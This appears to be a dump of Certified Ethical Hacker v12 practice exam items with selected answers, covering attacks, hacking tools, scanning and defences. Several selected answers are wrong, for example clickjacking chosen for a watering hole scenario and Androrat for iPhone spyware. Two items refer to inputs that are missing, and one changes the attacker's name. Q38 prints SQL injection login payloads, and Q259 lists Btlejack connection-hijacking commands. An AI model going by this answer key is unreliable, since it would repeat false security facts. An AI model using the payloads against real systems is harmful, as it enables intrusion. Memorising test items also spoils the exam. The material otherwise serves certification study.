Certified Ethical Hacker v12 Topic 1
Question #: 288
Topic #: 1
Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web server to identify any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an automated tool that eases his work and performs vulnerability scanning to find hosts, services, and other vulnerabilities in the target server.
Which of the following tools is used by Jack to perform vulnerability scanning?
A. Infoga
B. NCollector Studio
C. Netsparker
D. WebCopier Pro
Selected Answer: C
Question #: 219
Topic #: 1
You have been hired as an intern at a start-up company. Your first task is to help set up a basic web server for the company’s new website. The team leader has asked you to make sure the server is secure from common threats. Based on your knowledge from studying for the CEH exam, which of the following actions should be your priority to secure the web server?
A. Limiting the number of concurrent connections to the server
B. Installing a web application firewall
C. Regularly updating and patching the server software
D. Encrypting the company’s website with SSL/TLS
Selected Answer: D
Question #: 159
Topic #: 1
A certified ethical hacker is conducting a Whois footprinting activity on a specific domain. The individual is leveraging various tools such as Batch IP Converter and Whois Analyzer Pro to retrieve vital details but is unable to gather complete Whois information from the registrar for a particular set of data. As the hacker, what might be the probable data model being utilized by the domain’s registrar for storing and looking up Whois information?
A. Thin Whois model working correctly
B. Thin Whois model with a malfunctioning server
C. Thick Whois model with a malfunctioning server
D. Thick Whois model working correctly
Selected Answer: A
Question #: 144
Topic #: 1
You are a cybersecurity consultant for a major airport that offers free Wi-Fi to travelers. The management is concerned about the possibility of “Evil Twin” attacks, where a malicious actor sets up a rogue access point that mimics the legitimate one. They are looking for a solution that would not significantly impact the user experience or require travelers to install additional software. What is the most effective security measure you could recommend that fits these constraints, considering the airport’s unique operational environment?
A. Regularly change the SSID of the airport’s Wi-Fi network
B. Use MAC address filtering on the airport’s Wi-Fi network
C. Implement WPA3 encryption for the airport’s Wi-Fi network
D. Display a captive portal page that warns users about the possibility of Evil Twin attacks
Selected Answer: D
Question #: 35
Topic #: 1
Scenario: Joe turns on his home computer to access personal online banking. When he enters the URL www.bank.com, the website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When he examines the website URL closer, he finds that the site is not secure and the web address appears different.
What type of attack is he experiencing?
A. DHCP spoofing
B. DoS attack
C. ARP cache poisoning
D. DNS hijacking
Selected Answer: D
Question #: 180
Topic #: 1
During a reconnaissance mission, an ethical hacker uses Maltego, a popular footprinting tool, to collect information about a target organization. The information includes the target’s Internet infrastructure details (domains, DNS names, Netblocks, IP address information). The hacker decides to use social engineering techniques to gain further information. Which of the following would be the least likely method of social engineering to yield beneficial information based on the data collected?
A. Dumpster diving in the target company’s trash bins for valuable printouts
B. Impersonating an ISP technical support agent to trick the target into providing further network details
C. Shoulder surfing to observe sensitive credentials input on the target’s computers
D. Eavesdropping on internal corporate conversations to understand key topics
Selected Answer: A
Question #: 18
Topic #: 1
Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Robin plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network.
What is the attack performed by Robin in the above scenario?
A. ARP spoofing attack
B. STP attack
C. DNS poisoning attack
D. VLAN hopping attack
Selected Answer: B
Question #: 120
Topic #: 1
Which of the following protocols can be used to secure an LDAP service against anonymous queries?
A. NTLM
B. RADIUS
C. WPA
D. SSO
Selected Answer: A
Question #: 17
Topic #: 1
Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection.
What is the APT lifecycle phase that Harry is currently executing?
A. Initial intrusion
B. Persistence
C. Cleanup
D. Preparation
Selected Answer: A
Question #: 278
Topic #: 1
Which of the following types of SQL injection attacks extends the results returned by the original query, enabling attackers to run two or more statements if they have the same structure as the original one?
A. Union SQL injection
B. Error-based injection
C. Blind SQL injection
D. Boolean-based blind SQL injection
Selected Answer: A
Question #: 30
Topic #: 1
Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials.
Which of the following tools is employed by Clark to create the spoofed email?
A. Evilginx
B. Slowloris
C. PLCinject
D. PyLoris
Selected Answer: A
Question #: 92
Topic #: 1
Mike, a security engineer, was recently hired by BigFox Ltd. The company recently experienced disastrous DoS attacks. The management had instructed Mike to build defensive strategies for the company’s IT infrastructure to thwart DoS/DDoS attacks. Mike deployed some countermeasures to handle jamming and scrambling attacks.
What is the countermeasure Mike applied to defend against jamming and scrambling attacks?
A. Allow the transmission of all types of addressed packets at the ISP level
B. Disable TCP SYN cookie protection
C. Allow the usage of functions such as gets and strcpy
D. Implement cognitive radios in the physical layer
Selected Answer: D
Question #: 283
Topic #: 1
An attacker identified that a user and an access point are both compatible with WPA2 and WPA3 encryption. The attacker installed a rogue access point with only WPA2 compatibility in the vicinity and forced the victim to go through the WPA2 four-way handshake to get connected. After the connection was established, the attacker used automated tools to crack WPA2-encrypted messages.
What is the attack performed in the above scenario?
A. Cache-based attack
B. Timing-based attack
C. Downgrade security attack
D. Side-channel attack
Selected Answer: C
Question #: 297
Topic #: 1
Dayn, an attacker, wanted to detect if any honeypots are installed in a target network. For this purpose, he used a time-based TCP fingerprinting method to compare the response of a normal computer with the response of a honeypot to a manual SYN request.
Which of the following techniques is employed by Dayn to detect honeypots?
A. Detecting honeypots running on VMware
B. Detecting the presence of Snort_inline honeypots
C. Detecting the presence of Honeyd honeypots
D. Detecting the presence of Sebek-based honeypots
Selected Answer: C
Question #: 260
Topic #: 1
John, a professional hacker, targeted CyberSol Inc., an MNC. He decided to discover the IoT devices connected in the target network that are using default credentials and are vulnerable to various hijacking attacks. For this purpose, he used an automated tool to scan the target network for specific types of IoT devices and detect whether they are using the default, factory-set credentials.
What is the tool employed by John in the above scenario?
A. IoT Inspector
B. AT&T IoT Platform
C. IoTSeeker
D. Azure IoT Central
Selected Answer: C
Question #: 54
Topic #: 1
Jude, a pen tester, examined a network from a hacker’s perspective to identify exploits and vulnerabilities accessible to the outside world by using devices such as firewalls, routers, and servers. In this process, he also estimated the threat of network security attacks and determined the level of security of the corporate network.
What is the type of vulnerability assessment that Jude performed on the organization?
A. Application assessment
B. External assessment
C. Passive assessment
D. Host-based assessment
Selected Answer: B
Question #: 290
Topic #: 1
In an attempt to damage the reputation of a competitor organization, Hailey, a professional hacker, gathers a list of employee and client email addresses and other related information by using various search engines, social networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a list of words from the target website to further perform a brute-force attack on the previously gathered email addresses.
What is the tool used by Hailey for gathering a list of words from the target website?
A. CeWL
B. Orbot
C. Shadowsocks
D. Psiphon
Selected Answer: A
Question #: 307
Topic #: 1
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced.
Which of the following techniques is described in the above scenario?
A. Website footprinting
B. Dark web footprinting
C. VPN footprinting
D. VoIP footprinting
Selected Answer: B
Question #: 69
Topic #: 1
Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection.
Identify the behavior of the adversary in the above scenario.
A. Unspecified proxy activities
B. Use of command-line interface
C. Data staging
D. Use of DNS tunneling
Selected Answer: A
Question #: 106
Topic #: 1
Attacker Simon targeted the communication network of an organization and disabled the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. He then extracted all the non-network logon tokens from all the active processes to masquerade as a legitimate user to launch further attacks.
What is the type of attack performed by Simon?
A. Combinator attack
B. Dictionary attack
C. Rainbow table attack
D. Internal monologue attack
Selected Answer: D
Question #: 31
Topic #: 1
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation.
What is the type of vulnerability assessment tool employed by John in the above scenario?
A. Agent-based scanner
B. Network-based scanner
C. Cluster scanner
D. Proxy scanner
Selected Answer: A
Question #: 111
Topic #: 1
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson’s machine.
What is the social engineering technique Steve employed in the above scenario?
A. Diversion theft
B. Quid pro quo
C. Elicitation
D. Phishing
Selected Answer: C
Question #: 165
Topic #: 1
An experienced cyber attacker has created a fake LinkedIn profile, successfully impersonating a high-ranking official from a well-established company, to execute a social engineering attack. The attacker then connected with other employees within the organization, receiving invitations to exclusive corporate events and gaining access to proprietary project details shared within the network. What advanced social engineering technique has the attacker primarily used to exploit the system and what is the most likely immediate threat to the organization?
A. Whaling and Targeted Attacks
B. Pretexting and Network Vulnerability
C. Spear Phishing and Spam
D. Baiting and Involuntary Data Leakage
Selected Answer: B
Question #: 176
Topic #: 1
In an advanced digital security scenario, a multinational enterprise is being targeted with a complex series of assaults aimed to disrupt operations, manipulate data integrity, and cause serious financial damage. As the Lead Cybersecurity Analyst with CEH and CISSP certifications, your responsibility is to correctly identify the specific type of attack based on the following indicators:
The attacks are exploiting a vulnerability in the target system’s hardware, inducing misprediction of future instructions in a program’s control flow. The attackers are strategically inducing the victim process to speculatively execute instruction sequences that would not have been executed in the absence of the misprediction, leading to subtle side effects. These side effects, which are observable from the shared state, are then utilized to infer the values of in-flight data.
What type of attack best describes this scenario?
A. Rowhammer Attack
B. Watering Hole Attack
C. Side-Channel Attack
D. Privilege Escalation Attack
Selected Answer: C
Question #: 141
Topic #: 1
An organization suspects a persistent threat from a cybercriminal. They hire an ethical hacker, John, to evaluate their system security. John identifies several vulnerabilities and advises the organization on preventive measures. However, the organization has limited resources and opts to fix only the most severe vulnerability. Subsequently, a data breach occurs exploiting a different vulnerability. Which of the following statements best describes this scenario?
A. The organization is at fault because it did not fix all identified vulnerabilities.
B. Both the organization and John share responsibility because they did not adequately manage the vulnerabilities.
C. John is at fault because he did not emphasize the necessity of patching all vulnerabilities.
D. The organization is not at fault because they used their resources as per their understanding.
Selected Answer: A
Question #: 129
Topic #: 1
A skilled ethical hacker was assigned to perform a thorough OS discovery on a potential target. They decided to adopt an advanced fingerprinting technique and sent a TCP packet to an open TCP port with specific flags enabled. Upon receiving the reply, they noticed the flags were SYN and ECN-Echo. Which test did the ethical hacker conduct and why was this specific approach adopted?
A. Test 3: The test was executed to observe the response of the target system when a packet with URG, PSH, SYN, and FIN flags was sent, thereby identifying the OS
B. Test 2: This test was chosen because a TCP packet with no flags enabled is known as a NULL packet and this would allow the hacker to assess the OS of the target
C. Test 1: The test was conducted because SYN and ECN-Echo flags enabled to allow the hacker to probe the nature of the response and subsequently determine the OS fingerprint
D. Test 6: The hacker selected this test because a TCP packet with the ACK flag enabled sent to a closed TCP port would yield more information about the OS
Selected Answer: C
Question #: 114
Topic #: 1
Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed.
What is the port scanning technique used by Sam to discover open ports?
A. Xmas scan
B. IDLE/IPID header scan
C. TCP Maimon scan
D. ACK flag probe scan
Selected Answer: C
Question #: 113
Topic #: 1
Which of the following Metasploit post-exploitation modules can be used to escalate privileges on Windows systems?
A. getsystem
B. getuid
C. keylogrecorder
D. autoroute
Selected Answer: A
Question #: 294
Topic #: 1
Jake, a professional hacker, installed spyware on a target iPhone to spy on the target user’s activities. He can take complete control of the target mobile device by jailbreaking it remotely, and can record audio, capture screenshots, and monitor all phone calls and SMS messages.
What is the type of spyware that Jake used to infect the target device?
A. DroidSheep
B. Androrat
C. Trident
D. Zscaler
Selected Answer: B
Question #: 1
Topic #: 1
In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?
A. IDEA
B. Triple Data Encryption Standard
C. AES
D. MD5 encryption algorithm
Selected Answer: B
Question #: 140
Topic #: 1
XYZ company recently discovered a potential vulnerability on their network, originating from misconfigurations. It was found that some of their host servers had enabled debugging functions and unknown users were granted administrative permissions. As a Certified Ethical Hacker, what would be the most potent risk associated with this misconfiguration?
A. An attacker may be able to inject a malicious DLL into the current running process
B. Weak encryption might be allowing man-in-the-middle attacks, leading to data tampering
C. Unauthorized users may perform privilege escalation using unnecessarily created accounts
D. An attacker may carry out a Denial-of-Service assault draining the resources of the server in the process
Selected Answer: C
Question #: 29
Topic #: 1
Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to.
What type of hacker is Nicolas?
A. Black hat
B. White hat
C. Gray hat
D. Red hat
Selected Answer: C
Question #: 303
Topic #: 1
Which Nmap switch helps evade IDS or firewalls?
A. -D
B. -n/-R
C. -T
D. -oN/-oX/-oG
Selected Answer: C
Question #: 146
Topic #: 1
You are an ethical hacker tasked with conducting an enumeration of a company’s network. Given a Windows system with NetBIOS enabled, port 139 open, and file and printer sharing active, you are about to run some nbtstat commands to enumerate NetBIOS names. The company uses IPv6 for its network. Which of the following actions should you take next?
A. Switch to an enumeration tool that supports IPv6
B. Use nbtstat -a followed by the IPv6 address of the target machine
C. Use nbtstat -c to get the contents of the NetBIOS name cache
D. Utilize Nmap Scripting Engine (NSE) for NetBIOS enumeration
Selected Answer: B
Question #: 139
Topic #: 1
You are a cybersecurity consultant for a global organization. The organization has adopted a Bring Your Own Device (BYOD) policy, but they have recently experienced a phishing incident where an employee’s device was compromised. In the investigation, you discovered that the phishing attack occurred through a third-party email app that the employee had installed. Given the need to balance security and user autonomy under the BYOD policy, how should the organization mitigate the risk of such incidents? Moreover, consider a measure that would prevent similar attacks without overly restricting the use of personal devices.
A. Provide employees with corporate-owned devices for work-related tasks.
B. Require all employee devices to use a company-provided VPN for internet access.
C. Implement a mobile device management solution that restricts the installation of non-approved applications.
D. Conduct regular cybersecurity awareness training, focusing on phishing attacks.
Selected Answer: D
Question #: 137
Topic #: 1
A malicious user has acquired a Ticket Granting Service ticket from the domain controller using a valid user’s Ticket Granting Ticket in a Kerberoasting attack. He extracted the TGS tickets from memory for offline cracking. But the attacker was stopped before he could complete his attack. The system administrator needs to investigate and remediate the potential breach. What should be the immediate step the system administrator takes?
A. Perform a system reboot to clear the memory
B. Delete the compromised user’s account
C. Change the NTLM password hash used to encrypt the ST
D. Invalidate the TGS the attacker acquired
Selected Answer: C
Question #: 220
Topic #: 1
A sophisticated attacker targets your web server with the intent to execute a Denial of Service (DoS) attack. His strategy involves a unique mixture of TCP SYN, UDP, and ICMP floods, using ‘r’ packets per second. Your server, reinforced with advanced security measures, can handle ‘h’ packets per second before it starts showing signs of strain. If ‘r’ surpasses ‘h’, it overwhelms the server, causing it to become unresponsive. In a peculiar pattern, the attacker selects ‘r’ as a composite number and ‘h’ as a prime number, making the attack detection more challenging. Considering ‘r=2010’ and different values for ‘h’, which of the following scenarios would potentially cause the server to falter?
A. h=1987 (prime): The attacker’s packet rate exceeds the server’s capacity, causing potential unresponsiveness.
B. h=1999 (prime): Despite the attacker’s packet flood, the server can handle these requests, remaining responsive.
C. h=1993 (prime): Despite being less than ‘r’, the server’s prime number capacity keeps it barely operational, but the risk of falling is imminent.
D. h=2003 (prime): The server can manage more packets than the attacker is sending, hence it stays operational.
Selected Answer: A
Question #: 218
Topic #: 1
An ethical hacker is testing the security of a website’s database system against SQL Injection attacks. They discover that the IDS has a strong signature detection mechanism to detect typical SQL injection patterns. Which evasion technique can be most effectively used to bypass the IDS signature detection while performing a SQL Injection attack?
A. Employ IP fragmentation to obscure the attack payload
B. Implement case variation by altering the case of SQL statements
C. Leverage string concatenation to break identifiable keywords
D. Use Hex encoding to represent the SQL query string
Selected Answer: D
Question #: 213
Topic #: 1
As the chief security officer at SecureMobile, you are overseeing the development of a mobile banking application. You are aware of the potential risks of man-in-the-middle (MitM) attacks where an attacker might intercept communication between the app and the bank’s servers. Recently, you have learned about a technique used by attackers where they use rogue Wi-Fi hotspots to conduct MitM attacks. To prevent this type of attack, you plan to implement a security feature in the mobile app. What should this feature accomplish?
A. It should require two-factor authentication for user logins.
B. It should prevent the app from communicating over a network if it detects a rogue access point.
C. It should prevent the app from connecting to any unencrypted Wi-Fi networks.
D. It should require users to change their password every 30 days.
Selected Answer: C
Question #: 211
Topic #: 1
As a certified ethical hacker, you are tasked with gaining information about an enterprise’s internal network. You are permitted to test the network’s security using enumeration techniques. You successfully obtain a list of usernames using email IDs and execute a DNS Zone Transfer. Which enumeration technique would be most effective for your next move given that you have identified open TCP ports 25 (SMTP) and 139 (NetBIOS Session Service)?
A. Perform a brute force attack on Microsoft Active Directory to extract valid usernames
B. Exploit the NetBIOS Session Service on TCP port 139 to gain unauthorized access to the file system
C. Use SNMP to extract usernames given the community strings
D. Exploit the NFS protocol on TCP port 2049 to gain control over a remote system
Selected Answer: B
Question #: 207
Topic #: 1
A multinational corporation’s computer system was infiltrated by an advanced persistent threat (APT). During forensic analysis, it was discovered that the malware was utilizing a blend of two highly sophisticated techniques to stay undetected and continue its operations.
Firstly, the malware was embedding its harmful code into the actual binary or executable part of genuine system files rather than appending or prepending itself to the files. This made it exceptionally difficult to detect and eradicate, as doing so risked damaging the system files themselves.
Secondly, the malware exhibited characteristics of a type of malware that changes its code as it propagates, making signature-based detection approaches nearly impossible.
On top of these, the malware maintained a persistent presence by installing itself in the registry, making it able to survive system reboots.
Given these distinctive characteristics, which two types of malware techniques does this malware most closely embody?
A. Polymorphic and Metamorphic malware
B. Polymorphic and Macro malware
C. Macro and Rootkit malware
D. Metamorphic and Rootkit malware
Selected Answer: A
Question #: 38
Topic #: 1
Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials:
Based on the above credentials, which of the following SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability?
A. select * from Users where UserName = 'attack' ' or 1=1 -- and UserPassword = '123456'
B. select * from Users where UserName = 'attack' or 1=1 -- and UserPassword = '123456'
C. select * from Users where UserName = 'attack or 1=1 -- and UserPassword = '123456'
D. select * from Users where UserName = 'attack' or 1=1 --' and UserPassword = '123456'
Selected Answer: D
Question #: 210
Topic #: 1
During a red team engagement, an ethical hacker is tasked with testing the security measures of an organization’s wireless network. The hacker needs to select an appropriate tool to carry out a session hijacking attack. Which of the following tools should the hacker use to effectively perform session hijacking and subsequent security analysis, given that the target wireless network has the Wi-Fi Protected Access-pre-shared key (WPA-PSK) security protocol in place?
A. Hetty
B. bettercap
C. DroidSheep
D. FaceNiff
Selected Answer: B
Question #: 150
Topic #: 1
A large organization has recently performed a vulnerability assessment using Nessus Professional, and the security team is now preparing the final report. They have identified a high-risk vulnerability, named XYZ, which could potentially allow unauthorized access to the network. In preparing the report, which of the following elements would NOT be typically included in the detailed documentation for this specific vulnerability?
A. Proof of concept (PoC) of the vulnerability, if possible, to demonstrate its potential impact on the system.
B. The total number of high, medium, and low-risk vulnerabilities detected throughout the network.
C. The list of all affected systems within the organization that are susceptible to the identified vulnerability.
D. The CVE ID of the vulnerability and its mapping to the vulnerability’s name, XYZ.
Selected Answer: B
Question #: 195
Topic #: 1
A Certified Ethical Hacker (CEH) is analyzing a target network. To do this, he decides to utilize an IDLE/IPID header scan using Nmap. The network analysis reveals that the IPID number increases by 2 after following the steps of an IDLE scan. Based on this information, what can the CEH conclude about the target network?
A. The ports on the target network are open
B. The target network has no firewall present
C. The ports on the target network are closed
D. The target network has a stateful firewall present
Selected Answer: A
Question #: 160
Topic #: 1
You are a cybersecurity professional managing cryptographic systems for a global corporation. The company uses a mix of Elliptic Curve Cryptography (ECC) for key exchange and symmetric encryption algorithms for data encryption. The time complexity of ECC key pair generation is O(n^3), where ‘n’ is the size of the key. An advanced threat actor group has a quantum computer that can potentially break ECC with a time complexity of O((log n)^2). Given that the ECC key size is ‘n=512’ and varying symmetric encryption algorithms and key sizes, which scenario would provide the best balance of security and performance?
A. Data encryption with AES-128: Provides moderate security and fast encryption, offering a balance between the two.
B. Data encryption with AES-256: Provides high security with better performance than 3DES, but not as fast as other AES key sizes.
C. Data encryption with 3DES using a 168-bit key: Offers high security but slower performance due to 3DES’s inherent inefficiencies.
D. Data encryption with Blowfish using a 448-bit key: Offers high security but potential compatibility issues due to Blowfish’s less widespread use.
Selected Answer: B
Question #: 234
Topic #: 1
As a cybersecurity consultant for SafePath Corp, you have been tasked with implementing a system for secure email communication. The key requirement is to ensure both confidentiality and non-repudiation. While considering various encryption methods, you are inclined towards using a combination of symmetric and asymmetric cryptography. However, you are unsure which cryptographic technique would best serve the purpose. Which of the following options would you choose to meet these requirements?
A. Apply asymmetric encryption with RSA and use the private key for signing.
B. Use the Diffie-Hellman protocol for key exchange and encryption.
C. Apply asymmetric encryption with RSA and use the public key for encryption.
D. Use symmetric encryption with the AES algorithm.
Selected Answer: A
Question #: 32
Topic #: 1
Joel, a professional hacker, targeted a company and identified the types of websites frequently visited by its employees. Using this information, he searched for possible loopholes in these websites and injected a malicious script that can redirect users from the web page and download malware onto a victim’s machine. Joel waits for the victim to access the infected web application so as to compromise the victim’s machine.
Which of the following techniques is used by Joel in the above scenario?
A. Watering hole attack
B. DNS rebinding attack
C. MarioNet attack
D. Clickjacking attack
Selected Answer: D
Question #: 167
Topic #: 1
A certified ethical hacker is carrying out an email footprinting exercise on a targeted organization using eMailTrackerPro. They want to map out detailed information about the recipient’s activities after receiving the email. Which among the following pieces of information would NOT be directly obtained from eMailTrackerPro during this exercise?
A. Geolocation of the recipient
B. Type of device used to open the email
C. The email accounts related to the domain of the organization
D. The time recipient spent reading the email
Selected Answer: C
Question #: 28
Topic #: 1
To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time.
Which technique is discussed here?
A. Subnet scanning technique
B. Permutation scanning technique
C. Hit-list scanning technique
D. Topological scanning technique
Selected Answer: C
Question #: 27
Topic #: 1
Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.
What is the type of web-service API mentioned in the above scenario?
A. RESTful API
B. JSON-RPC
C. SOAP API
D. REST API
Selected Answer: A
Question #: 26
Topic #: 1
What piece of hardware on a computer’s motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible?
A. CPU
B. UEFI
C. GPU
D. TPM
Selected Answer: D
Question #: 24
Topic #: 1
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.
What is the component of the Docker architecture used by Annie in the above scenario?
A. Docker objects
B. Docker daemon
C. Docker client
D. Docker registries
Selected Answer: B
Question #: 23
Topic #: 1
John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization.
What is the tool employed by John to gather information from the LDAP service?
A. ike-scan
B. Zabasearch
C. JXplorer
D. EarthExplorer
Selected Answer: C
Question #: 21
Topic #: 1
Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider.
In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?
A. Cloud consumer
B. Cloud broker
C. Cloud auditor
D. Cloud carrier
Selected Answer: D
Question #: 177
Topic #: 1
In the process of implementing a network vulnerability assessment strategy for a tech company, the security analyst is confronted with the following scenarios:
1) A legacy application is discovered on the network, which no longer receives updates from the vendor.
2) Several systems in the network are found running outdated versions of web browsers prone to distributed attacks.
3) The network firewall has been configured using default settings and passwords.
4) Certain TCP/IP protocols used in the organization are inherently insecure.
The security analyst decides to use vulnerability scanning software. Which of the following limitations of vulnerability assessment should the analyst be most cautious about in this context?
A. Vulnerability scanning software cannot define the impact of an identified vulnerability on different business operations
B. Vulnerability scanning software is not immune to software engineering flaws that might lead to serious vulnerabilities being missed
C. Vulnerability scanning software is limited in its ability to detect vulnerabilities at a given point in time
D. Vulnerability scanning software is limited in its ability to perform live tests on web applications to detect errors or unexpected behavior
Selected Answer: A
Question #: 20
Topic #: 1
CyberTech Inc. recently experienced SQL injection attacks on its official website. The company appointed Bob, a security professional, to build and incorporate defensive strategies against such attacks. Bob adopted a practice whereby only a list of entities such as the data type, range, size, and value, which have been approved for secured access, is accepted.
What is the defensive technique employed by Bob in the above scenario?
A. Whitelist validation
B. Output encoding
C. Blacklist validation
D. Enforce least privileges
Selected Answer: A
Question #: 19
Topic #: 1
An attacker utilizes a Wi-Fi Pineapple to run an access point with a legitimate-looking SSID for a nearby business in order to capture the wireless password.
What kind of attack is this?
A. MAC spoofing attack
B. War driving attack
C. Phishing attack
D. Evil-twin attack
Selected Answer: D (a rogue access point broadcasting a legitimate-looking SSID to harvest the wireless password is an evil-twin attack; war driving is only the act of locating wireless networks while moving around)
Question #: 16
Topic #: 1
Becky has been hired by a client from Dubai to perform a penetration test against one of their remote offices. Working from her location in Columbus, Ohio, Becky runs her usual reconnaissance scans to obtain basic information about their network. When analyzing the results of her Whois search, Becky notices that the IP was allocated to a location in Le Havre, France.
Which regional Internet registry should Becky go to for detailed information?
A. ARIN
B. LACNIC
C. APNIC
D. RIPE
Selected Answer: D
Question #: 15
Topic #: 1
Taylor, a security professional, uses a tool to monitor her company’s website, analyze the website’s traffic, and track the geographical location of the users visiting the company’s website.
Which of the following tools did Taylor employ in the above scenario?
A. Webroot
B. Web-Stat
C. WebSite-Watcher
D. WAFW00F
Selected Answer: B
Question #: 14
Topic #: 1
An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests.
What is the type of vulnerability assessment solution that James employed in the above scenario?
A. Service-based solutions
B. Product-based solutions
C. Tree-based assessment
D. Inference-based assessment
Selected Answer: D
Question #: 52
Topic #: 1
Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network.
What is the online tool employed by Clark in the above scenario?
A. DuckDuckGo
B. AOL
C. ARIN
D. Baidu
Selected Answer: C
Question #: 289
Topic #: 1
Stephen, an attacker, targeted the industrial control systems of an organization. He generated a fraudulent email with a malicious attachment and sent it to employees of the target organization. An employee who manages the sales software of the operational plant opened the fraudulent email and clicked on the malicious attachment. This resulted in the malicious attachment being downloaded and malware being injected into the sales software maintained in the victim’s system. Further, the malware propagated itself to other networked systems, finally damaging the industrial automation components.
What is the attack technique used by Stephen to damage the industrial systems?
A. HMI-based attack
B. SMishing attack
C. Reconnaissance attack
D. Spear-phishing attack
Selected Answer: D
Question #: 280
Topic #: 1
Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following input?
A. SQLi
B. XXE
C. XSS
D. IDOR
Selected Answer: B
Question #: 259
Topic #: 1
Clark, a professional hacker, attempted to perform a Btlejacking attack using an automated tool, Btlejack, and hardware tool, micro:bit. This attack allowed Clark to hijack, read, and export sensitive information shared between connected devices. To perform this attack, Clark executed various btlejack commands.
Which of the following commands was used by Clark to hijack the connections?
A. btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
B. btlejack -c any
C. btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
D. btlejack -f 0x129f3244 -j
Selected Answer: A
Question #: 250
Topic #: 1
A bank stores and processes sensitive privacy information related to home loans. However, auditing has never been enabled on the system. What is the first step that the bank should take before enabling the audit feature?
A. Perform a vulnerability scan of the system.
B. Determine the impact of enabling the audit feature.
C. Perform a cost/benefit analysis of the audit feature.
D. Allocate funds for staffing of audit log review.
Selected Answer: B
Question #: 244
Topic #: 1
As a budding cybersecurity enthusiast, you have set up a small lab at home to learn more about wireless network security. While experimenting with your home Wi-Fi network, you decide to use a well-known hacking tool to capture network traffic and attempt to crack the Wi-Fi password. However, despite many attempts, you have been unsuccessful. Your home Wi-Fi network uses WPA2 Personal with AES encryption. Why are you finding it difficult to crack the Wi-Fi password?
A. Your hacking tool is outdated.
B. The Wi-Fi password is too complex and long.
C. The network is using an uncrackable encryption method.
D. The network is using MAC address filtering.
Selected Answer: B
Question #: 238
Topic #: 1
As an IT Security Analyst, you’ve been asked to review the security measures of an e-commerce website that relies on a SQL database for storing sensitive customer data. Recently, an anonymous tip has alerted you to a possible threat: a seasoned hacker who specializes in SQL Injection attacks may be targeting your system. The site already employs input validation measures to prevent basic injection attacks, and it blocks any user inputs containing suspicious patterns. However, this hacker is known to use advanced SQL Injection techniques. Given this situation, which of the following strategies would the hacker most likely adopt to bypass your security measures?
A. The hacker might employ a ‘blind’ SQL Injection attack, taking advantage of the application’s true or false responses to extract data bit by bit
B. The hacker may resort to a DDoS attack instead, attempting to crash the server and thus render the e-commerce site unavailable
C. The hacker may try to use SQL commands which are less known and less likely to be blocked by your system’s security
D. The hacker could deploy an ‘out-of-band’ SQL Injection attack, extracting data via a different communication channel, such as DNS or HTTP requests
Selected Answer: A
